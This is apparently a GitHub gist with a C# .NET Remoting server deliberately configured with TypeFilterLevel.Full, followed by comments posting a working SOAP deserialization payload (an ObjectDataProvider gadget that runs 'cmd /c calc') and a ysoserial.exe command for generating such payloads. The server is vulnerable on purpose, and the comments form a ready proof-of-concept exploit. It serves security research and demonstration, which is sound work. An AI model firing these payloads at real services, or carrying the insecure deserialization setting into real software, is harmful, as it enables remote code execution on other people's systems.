@adon90
Created March 20, 2019 17:24
using System;
using System.Collections;
using System.Runtime.Remoting;
using System.Runtime.Remoting.Channels;
using System.Runtime.Remoting.Channels.Http;
using System.Runtime.Serialization.Formatters;
namespace ExampleRemoting
{
/// <summary>
/// Remotable service object (it derives from MarshalByRefObject) that Server.Main
/// publishes as a well-known singleton, so the argument of MyMethod arrives from
/// whichever client talks to the registered channel.
/// </summary>
public class DateTimeServer : MarshalByRefObject, IDisposable
{
    private const string ActivatedMessage = "DateTime server activated";
    private const string DestroyedMessage = "DateTime server Object Destroyed.";
    private const string GreetingFormat = "Hi {0}. Here is the current DateTime: {1}";

    /// <summary>Announces on the console that the service object was created.</summary>
    public DateTimeServer()
    {
        Console.WriteLine(ActivatedMessage);
    }

    /// <summary>Announces destruction; skipped once Dispose has suppressed finalization.</summary>
    ~DateTimeServer()
    {
        Console.WriteLine(DestroyedMessage);
    }

    /// <summary>
    /// Nothing unmanaged is held, so disposing only opts out of the finalizer message.
    /// </summary>
    public void Dispose()
    {
        GC.SuppressFinalize(this);
    }

    /// <summary>
    /// Builds a greeting containing the local current time, writes it to the console
    /// and returns it.
    /// </summary>
    /// <param name="name">Name to greet. Over remoting this value is client-controlled
    /// and is echoed to the console verbatim.</param>
    /// <returns>The greeting, with the timestamp formatted by the current culture.</returns>
    public String MyMethod(String name)
    {
        string greeting = string.Format(GreetingFormat, name, DateTime.Now);
        Console.WriteLine(greeting);
        return greeting;
    }
}
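/// <summary>
/// Console host that publishes DateTimeServer as a well-known singleton over an
/// HTTP remoting channel with a SOAP formatter, then waits for Enter before exiting.
/// </summary>
public class Server
{
    /// <summary>TCP port the HTTP channel listens on.</summary>
    private const int Port = 9999;

    /// <summary>Channel name handed to the remoting infrastructure.</summary>
    private const string ChannelName = "Test Remoting Services";

    /// <summary>Object URI under which the singleton is published.</summary>
    private const string ObjectUri = "TuPutisimaMadreEnPatinete.soap";

    /// <summary>
    /// Registers the channel and the service type, blocks on ReadLine, and unregisters
    /// the channel on the way out (also when service-type registration throws).
    /// </summary>
    public static void Main()
    {
        SoapServerFormatterSinkProvider sinkProvider = new SoapServerFormatterSinkProvider
        {
            // SECURITY: Full lets the SOAP formatter deserialize every type remoting supports,
            // so any client that can reach the port decides what gets instantiated server-side;
            // this is the setting the payloads in the accompanying comments target. Low, the
            // other documented level, restricts deserialization to the types basic remoting
            // needs. Kept as Full here because this listing exists to demonstrate the weakness;
            // a real service should use Low and not expose .NET Remoting to untrusted networks.
            TypeFilterLevel = TypeFilterLevel.Full
        };

        IDictionary channelProperties = new Hashtable();
        channelProperties["port"] = Port;
        channelProperties["proxyName"] = null;
        channelProperties["name"] = ChannelName;
        // No client-sink provider is supplied (null); the server sink chain starts with the SOAP formatter.
        HttpChannel channel = new HttpChannel(channelProperties, null, sinkProvider);

        // Second argument is ensureSecurity; false requests no channel-level security.
        ChannelServices.RegisterChannel(channel, false);
        try
        {
            RemotingConfiguration.RegisterWellKnownServiceType(
                typeof(DateTimeServer), ObjectUri, WellKnownObjectMode.Singleton);
            Console.WriteLine("press <enter> to exit.");
            Console.ReadLine();
        }
        finally
        {
            // Stop listening explicitly instead of leaving the channel registered until process teardown.
            ChannelServices.UnregisterChannel(channel);
        }
    }

    /// <summary>
    /// Duplicate of DateTimeServer.MyMethod. Server itself is never registered with
    /// remoting in this file and nothing here calls this method; kept so the public
    /// surface of the class is unchanged.
    /// </summary>
    /// <param name="name">Name to greet.</param>
    /// <returns>The greeting that was also written to the console.</returns>
    public String MyMethod(String name)
    {
        string greeting = "Hi " + name + ". Here is the current DateTime: " + DateTime.Now;
        Console.WriteLine(greeting);
        return greeting;
    }
}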
}
adon90 commented Mar 20, 2019

Payload 2:

<SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">

<a1:TextFormattingRunProperties id="ref-1" xmlns:a1="http://schemas.microsoft.com/clr/nsassem/Microsoft.VisualStudio.Text.Formatting/Microsoft.PowerShell.Editor%2C%20Version%3D3.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D31bf3856ad364e35">

<ForegroundBrush id="ref-3">&#60;ResourceDictionary

 xmlns=&#34;http://schemas.microsoft.com/winfx/2006/xaml/presentation&#34;

 xmlns:x=&#34;http://schemas.microsoft.com/winfx/2006/xaml&#34;

 xmlns:System=&#34;clr-namespace:System;assembly=mscorlib&#34;

 xmlns:Diag=&#34;clr-namespace:System.Diagnostics;assembly=system&#34;&#62;

 &#60;ObjectDataProvider x:Key=&#34;LaunchCalc&#34; ObjectType = &#34;{ x:Type Diag:Process}&#34; MethodName = &#34;Start&#34; &#62;

 &#60;ObjectDataProvider.MethodParameters&#62;

 &#60;System:String&#62;cmd&#60;/System:String&#62;

 &#60;System:String&#62;/c &#34;calc&#34; &#60;/System:String&#62;

 &#60;/ObjectDataProvider.MethodParameters&#62;

 &#60;/ObjectDataProvider&#62;

&#60;/ResourceDictionary&#62;</ForegroundBrush>

</a1:TextFormattingRunProperties>

</SOAP-ENV:Envelope>

adon90 commented Mar 20, 2019

ysoserial.exe -f SoapFormatter -g WindowsIdentity -c "calc" -o raw -t

0xVIC commented Mar 20, 2019

Nice aDon90
